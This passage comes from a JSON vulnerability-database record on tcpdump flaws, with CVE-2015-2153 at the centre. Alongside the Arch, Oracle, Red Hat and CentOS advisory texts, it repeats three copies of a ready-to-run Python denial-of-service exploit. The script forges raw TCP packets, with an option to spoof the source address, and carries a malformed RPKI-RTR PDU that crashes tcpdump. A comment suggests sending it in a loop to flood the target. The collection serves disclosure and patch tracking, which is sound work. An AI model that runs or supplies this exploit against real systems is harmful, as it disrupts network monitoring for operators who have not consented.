print-ppp.c allows remote\nattackers to cause a denial of service (crash) cia a crafted PPP packet\nor possibly execute arbitrary code.\n\n- CVE-2015-0261 (out-of-bounds memory read)\n\nIPv6 mobility printer mobility_opt_print() typecastimg/signedness error\nwould handle "len" as "int" (=positive and negative numbers), instead of\n"unsigned int" (=only positive numbers). When calling\nmobility_opt_print() with a negative "len", the "i < len" check would\nnot be satisfied and it would not enter the loop and try to read from bp[i].\n\n- CVE-2015-2153 (arbitrary code execution)\n\nTCP printer problem with missing length check in the\nrpki_rtr_pdu_print() function in print-rpki-rtr.c when processing\nRPKI-RTR PDUs (Protocol Data Units) with an incorrect header length.\nWithout this check, the function will try to operate on invalid data\nwhen processing certain packets, leading to all kinds of unwanted side\neffects, including crashes due to invalid reads, writes and general\nmemory corruption. Due to the memory corruption aspect it may lead to\ncode execution.\n\n- CVE-2015-2154 (out-of-bounds memory read)\n\nEthernet printer osi_print_cksum() missing sanity checks in\nprint-isoclns.c. The function may call the create_osi_cksum() function\nin checksum.c with invalid data leading to out-of-bounds memory read.\n\n- CVE-2015-2155 (arbitrary code execution)\n\nA flaw was found in tcpdump's force printer. A remote attacker could use\nthis flaw to cause tcpdump to crash, resulting in a denial of service,\nor possibly execute arbitrary code.", "modified": "2015-03-20T00:00:00", "published": "2015-03-20T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000261.html", "id": "ASA-201503-20", "title": "tcpdump: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:37", "bulletinFamily": "exploit", "description": "", "modified": "2015-07-21T00:00:00", "published": "2015-07-21T00:00:00", "href": "https://packetstormsecurity.com/files/132762/tcpdump-rpki_rtr_pdu_print-Out-Of-Bounds-Denial-Of-Service.html", "id": "PACKETSTORM:132762", "type": "packetstorm", "title": "tcpdump rpki_rtr_pdu_print Out-Of-Bounds Denial Of Service", "sourceData": "`# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service \n# Date: 7.18.2015 \n# Exploit Author: Luke Arntson arntsonl@gmail.com \n# Vendor Homepage: http://www.tcpdump.org/ \n# Software Link: http://www.tcpdump.org/ \n# Version: 4.6.2, 4.5.1, 4.4.0 \n# Tested on: Lubuntu 14.04 64-bit \n# CVE : CVE-2015-2153 \n \n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger. \n \nimport socket, sys \nfrom struct import * \n \ndef checksum(msg): \ns = 0 \nfor i in range(0, len(msg), 2): \nw = ord(msg[i]) + (ord(msg[i+1]) << 8 ) \ns = s + w \ns = (s>>16) + (s & 0xffff); \ns = s + (s >> 16); \ns = ~s & 0xffff \nreturn s \n \nif len(sys.argv) != 3: \nprint \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\" \nexit() \n \n# fake the source and destination \nsource_ip = sys.argv[1] \ndest_ip = sys.argv[2] \n \ntry: \ns = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) \nexcept socket.error , msg: \nprint 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] \nsys.exit() \n \npacket = '' \n \n# ip header fields \nip_ihl = 5 \nip_ver = 4 \nip_tos = 0 \nip_tot_len = 0 # kernel will fill the correct total length \nip_id = 54321 #Id of this packet \nip_frag_off = 0 \nip_ttl = 255 \nip_proto = socket.IPPROTO_TCP \nip_check = 0 # kernel will fill the correct checksum \nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to \nip_daddr = socket.inet_aton ( dest_ip ) \n \nip_ihl_ver = (ip_ver << 4) + ip_ihl \n \nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) \n \n# tcp header fields \ntcp_source = 255 # source port \ntcp_dest = 323 # destination port \ntcp_seq = 454 \ntcp_ack_seq = 0 \ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes \n#tcp flags \ntcp_fin = 0 \ntcp_syn = 1 \ntcp_rst = 0 \ntcp_psh = 0 \ntcp_ack = 0 \ntcp_urg = 0 \ntcp_window = socket.htons (5840) # maximum allowed window size \ntcp_check = 0 \ntcp_urg_ptr = 0 \n \ntcp_offset_res = (tcp_doff << 4) + 0 \ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5) \n \ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr) \n \n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type. \n# The RPKI pdu looks like the following \n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ] \n# by giving message length a long value, we cause the buffer to write into bad memory \nerror_pdu = '\\x41' # fake version \nerror_pdu = error_pdu + '\\x0A' # error type \nerror_pdu = error_pdu + '\\x00\\x01' # error number \nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total packet length \nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu \nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS \nerror_pdu = error_pdu + 'AAAA' # fake message \n \nuser_data = error_pdu \n \n# pseudo header fields \nsource_address = socket.inet_aton( source_ip ) \ndest_address = socket.inet_aton(dest_ip) \nplaceholder = 0 \nprotocol = socket.IPPROTO_TCP \ntcp_length = len(tcp_header) + len(user_data) \n \npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length); \npsh = psh + tcp_header + user_data; \n \ntcp_check = checksum(psh) \n \n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order \ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr) \n \n# final full packet - syn packets dont have any data \npacket = ip_header + tcp_header + user_data \n \n#Send the packet finally - the port specified has no effect \ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132762/tcpdumpoob-dos.txt"}], "zdt": [{"lastseen": "2018-01-03T05:01:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2015-07-21T00:00:00", "published": "2015-07-21T00:00:00", "id": "1337DAY-ID-23903", "href": "https://0day.today/exploit/description/23903", "type": "zdt", "title": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service Exploit", "sourceData": "# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service\r\n# Date: 7.18.2015\r\n# Exploit Author: Luke Arntson [email\u00a0protected]\r\n# Vendor Homepage: http://www.tcpdump.org/\r\n# Software Link: http://www.tcpdump.org/\r\n# Version: 4.6.2, 4.5.1, 4.4.0\r\n# Tested on: Lubuntu 14.04 64-bit\r\n# CVE : CVE-2015-2153\r\n \r\n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.\r\n \r\nimport socket, sys\r\nfrom struct import *\r\n \r\ndef checksum(msg):\r\n s = 0\r\n for i in range(0, len(msg), 2):\r\n w = ord(msg[i]) + (ord(msg[i+1]) << 8 )\r\n s = s + w\r\n s = (s>>16) + (s & 0xffff);\r\n s = s + (s >> 16);\r\n s = ~s & 0xffff\r\n return s\r\n \r\nif len(sys.argv) != 3:\r\n print \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\"\r\n exit()\r\n \r\n# fake the source and destination\r\nsource_ip = sys.argv[1]\r\ndest_ip = sys.argv[2]\r\n \r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\r\nexcept socket.error , msg:\r\n print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]\r\n sys.exit()\r\n \r\npacket = ''\r\n \r\n# ip header fields\r\nip_ihl = 5\r\nip_ver = 4\r\nip_tos = 0\r\nip_tot_len = 0 # kernel will fill the correct total length\r\nip_id = 54321 #Id of this packet\r\nip_frag_off = 0\r\nip_ttl = 255\r\nip_proto = socket.IPPROTO_TCP\r\nip_check = 0 # kernel will fill the correct checksum\r\nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to\r\nip_daddr = socket.inet_aton ( dest_ip )\r\n \r\nip_ihl_ver = (ip_ver << 4) + ip_ihl\r\n \r\nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)\r\n \r\n# tcp header fields\r\ntcp_source = 255 # source port\r\ntcp_dest = 323 # destination port\r\ntcp_seq = 454\r\ntcp_ack_seq = 0\r\ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\r\n#tcp flags\r\ntcp_fin = 0\r\ntcp_syn = 1\r\ntcp_rst = 0\r\ntcp_psh = 0\r\ntcp_ack = 0\r\ntcp_urg = 0\r\ntcp_window = socket.htons (5840) # maximum allowed window size\r\ntcp_check = 0\r\ntcp_urg_ptr = 0\r\n \r\ntcp_offset_res = (tcp_doff << 4) + 0\r\ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)\r\n \r\ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)\r\n \r\n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.\r\n# The RPKI pdu looks like the following\r\n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]\r\n# by giving message length a long value, we cause the buffer to write into bad memory\r\nerror_pdu = '\\x41' # fake version\r\nerror_pdu = error_pdu + '\\x0A' # error type\r\nerror_pdu = error_pdu + '\\x00\\x01' # error number\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total packet length\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu\r\nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS\r\nerror_pdu = error_pdu + 'AAAA' # fake message\r\n \r\nuser_data = error_pdu\r\n \r\n# pseudo header fields\r\nsource_address = socket.inet_aton( source_ip )\r\ndest_address = socket.inet_aton(dest_ip)\r\nplaceholder = 0\r\nprotocol = socket.IPPROTO_TCP\r\ntcp_length = len(tcp_header) + len(user_data)\r\n \r\npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);\r\npsh = psh + tcp_header + user_data;\r\n \r\ntcp_check = checksum(psh)\r\n \r\n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order\r\ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)\r\n \r\n# final full packet - syn packets dont have any data\r\npacket = ip_header + tcp_header + user_data\r\n \r\n#Send the packet finally - the port specified has no effect\r\ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23903"}], "exploitdb": [{"lastseen": "2016-02-04T06:18:52", "bulletinFamily": "exploit", "description": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service. CVE-2015-2153. Dos exploit for linux platform", "modified": "2015-07-20T00:00:00", "published": "2015-07-20T00:00:00", "id": "EDB-ID:37663", "href": "https://www.exploit-db.com/exploits/37663/", "type": "exploitdb", "title": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service", "sourceData": "# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service\r\n# Date: 7.18.2015\r\n# Exploit Author: Luke Arntson arntsonl@gmail.com\r\n# Vendor Homepage: http://www.tcpdump.org/\r\n# Software Link: http://www.tcpdump.org/\r\n# Version: 4.6.2, 4.5.1, 4.4.0\r\n# Tested on: Lubuntu 14.04 64-bit\r\n# CVE : CVE-2015-2153\r\n \r\n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.\r\n \r\nimport socket, sys\r\nfrom struct import *\r\n \r\ndef checksum(msg):\r\n s = 0\r\n for i in range(0, len(msg), 2):\r\n w = ord(msg[i]) + (ord(msg[i+1]) << 8 )\r\n s = s + w\r\n s = (s>>16) + (s & 0xffff);\r\n s = s + (s >> 16);\r\n s = ~s & 0xffff\r\n return s\r\n\r\nif len(sys.argv) != 3:\r\n print \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\"\r\n exit()\r\n\r\n# fake the source and destination\r\nsource_ip = sys.argv[1]\r\ndest_ip = sys.argv[2]\r\n\t\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\r\nexcept socket.error , msg:\r\n print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]\r\n sys.exit()\r\n \r\npacket = ''\r\n\r\n# ip header fields\r\nip_ihl = 5\r\nip_ver = 4\r\nip_tos = 0\r\nip_tot_len = 0 # kernel will fill the correct total length\r\nip_id = 54321 #Id of this packet\r\nip_frag_off = 0\r\nip_ttl = 255\r\nip_proto = socket.IPPROTO_TCP\r\nip_check = 0 # kernel will fill the correct checksum\r\nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to\r\nip_daddr = socket.inet_aton ( dest_ip )\r\n \r\nip_ihl_ver = (ip_ver << 4) + ip_ihl\r\n \r\nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)\r\n \r\n# tcp header fields\r\ntcp_source = 255 # source port\r\ntcp_dest = 323 # destination port\r\ntcp_seq = 454\r\ntcp_ack_seq = 0\r\ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\r\n#tcp flags\r\ntcp_fin = 0\r\ntcp_syn = 1\r\ntcp_rst = 0\r\ntcp_psh = 0\r\ntcp_ack = 0\r\ntcp_urg = 0\r\ntcp_window = socket.htons (5840) # maximum allowed window size\r\ntcp_check = 0\r\ntcp_urg_ptr = 0\r\n \r\ntcp_offset_res = (tcp_doff << 4) + 0\r\ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)\r\n \r\ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)\r\n\r\n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.\r\n# The RPKI pdu looks like the following\r\n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]\r\n# by giving message length a long value, we cause the buffer to write into bad memory\r\nerror_pdu = '\\x41' # fake version\r\nerror_pdu = error_pdu + '\\x0A' # error type\r\nerror_pdu = error_pdu + '\\x00\\x01' # error number\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total packet length\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu\r\nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS\r\nerror_pdu = error_pdu + 'AAAA' # fake message\r\n\r\nuser_data = error_pdu\r\n\r\n# pseudo header fields\r\nsource_address = socket.inet_aton( source_ip )\r\ndest_address = socket.inet_aton(dest_ip)\r\nplaceholder = 0\r\nprotocol = socket.IPPROTO_TCP\r\ntcp_length = len(tcp_header) + len(user_data)\r\n \r\npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);\r\npsh = psh + tcp_header + user_data;\r\n \r\ntcp_check = checksum(psh)\r\n\r\n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order\r\ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)\r\n \r\n# final full packet - syn packets dont have any data\r\npacket = ip_header + tcp_header + user_data\r\n \r\n#Send the packet finally - the port specified has no effect\r\ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37663/"}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:58", "bulletinFamily": "unix", "description": "[14:4.9.0-5]\r\n- Resolves: #1441597; use bigger capture buffer than in upstream\r\n \n[14:4.9.0-4]\r\n- Drop downstream patch (drop root privileges)\r\n- Add libcap-ng as a new build dependency\r\n- Related: #1262283\r\n \n[14:4.9.0-3]\r\n- Fix tests according to our patches and libpcap version\r\n \n[14:4.9.0-2]\r\n- Use getnameinfo instead of gethostbyaddr\r\n \n[14:4.9.0-1]\r\n- New upstream version 4.9.0. Resolves: #1422473\r\n- Add legacy -P switch with warning. Related to #1422473 and #1292056\r\n \n[14:4.5.1-6]\r\n- Drop root before creating any dump file. Resolves: #1262283\r\n \n[14:4.5.1-5]\r\n- Use -Q instead of -P to set capture direction. Resolves: #1292056\r\n \n[14:4.5.1-4]\r\n- Fix segfault with --help option. Resolves: #1297812", "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-1871", "href": "http://linux.oracle.com/errata/ELSA-2017-1871.html", "title": "tcpdump security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:42", "bulletinFamily": "unix", "description": "The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.\n\nThe following packages have been upgraded to a later upstream version: tcpdump (4.9.0). (BZ#1422473)\n\nSecurity Fix(es):\n\n* Multiple out of bounds read and integer overflow vulnerabilities were found in tcpdump affecting the decoding of various protocols. An attacker could create a crafted pcap file or send specially crafted packets to the network segment where tcpdump is running in live capture mode (without -w) which could cause it to display incorrect data, crash or enter an infinite loop. (CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, CVE-2017-5486)\n\nRed Hat would like to thank the Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:32:19", "published": "2017-08-01T07:03:57", "id": "RHSA-2017:1871", "href": "https://access.redhat.com/errata/RHSA-2017:1871", "type": "redhat", "title": "(RHSA-2017:1871) Moderate: tcpdump security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:25:34", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:1871\n\n\nThe tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.\n\nThe following packages have been upgraded to a later upstream version: tcpdump (4.9.0). (BZ#1422473)\n\nSecurity Fix(es):\n\n* Multiple out of bounds read and integer overflow vulnerabilities were found in tcpdump affecting the decoding of various protocols. An attacker could create a crafted pcap file or send specially crafted packets to the network segment where tcpdump is running in live capture mode (without -w) which could cause it to display incorrect data, crash or enter an infinite loop. (CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, CVE-2017-5486)\n\nRed Hat would like to thank the Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004570.html\n\n**Affected packages:**\ntcpdump\n\n**Upstream details at:**\n", "modified": "2017-08-24T01:41:48", "published": "2017-08-24T01:41:48", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004570.html", "id": "CESA-2017:1871", "title": "tcpdump security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}